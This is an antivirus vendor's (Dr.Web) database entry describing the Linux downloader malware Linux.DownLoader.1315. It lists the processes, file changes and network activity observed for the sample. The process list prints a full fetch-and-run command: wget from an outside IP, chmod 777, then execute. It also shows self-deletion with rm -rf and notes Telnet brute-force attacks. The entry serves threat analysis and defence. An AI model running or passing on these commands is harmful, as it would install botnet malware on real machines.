Library
My library

+ Add to library

Profile

Linux.DownLoader.1315

Added to the Dr.Web virus database: 2019-08-08

Virus description added:

Technical Information

Malicious functions:
Removes itself
Launches itself as a daemon
Launches processes:
  • sh -c wget http://34.67.138.200/dark_bins/dark.mpsl; chmod 777 *; ./dark.mpsl wget.loader.mpsl
  • wget http://34.67.138.200/dark_bins/dark.mpsl
  • chmod 777 dark.mpsl run.sh stdout.log
  • ./dark.mpsl wget.loader.mpsl
  • sh -c rm -rf hmpsl
  • rm -rf hmpsl
Performs operations with the file system:
Modifies file access rights:
  • /root/dark.mpsl
  • /root/run.sh
Creates or modifies files:
  • /root/dark.mpsl
Deletes files:
  • /root/hmpsl
Network activity:
Establishes connection:
  • 8.#.8.8:53
  • 34.##.138.200:1791
Attacks using a special dictionary (brute-force technique) via the Telnet protocol.
HTTP GET requests:
  • 34.##.###.200/dark_bins/dark.mpsl
Sends data to the following servers:
  • 34.##.138.200:1791
  • 67.###.48.237:23
  • 10#.#21.5.97:23
  • 16#.##2.139.153:23
Receives data from the following servers:
  • 34.##.138.200:1791

Curing recommendations


Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Free trial

One month (no registration) or three months (registration and renewal discount)

Download Dr.Web

Download by serial number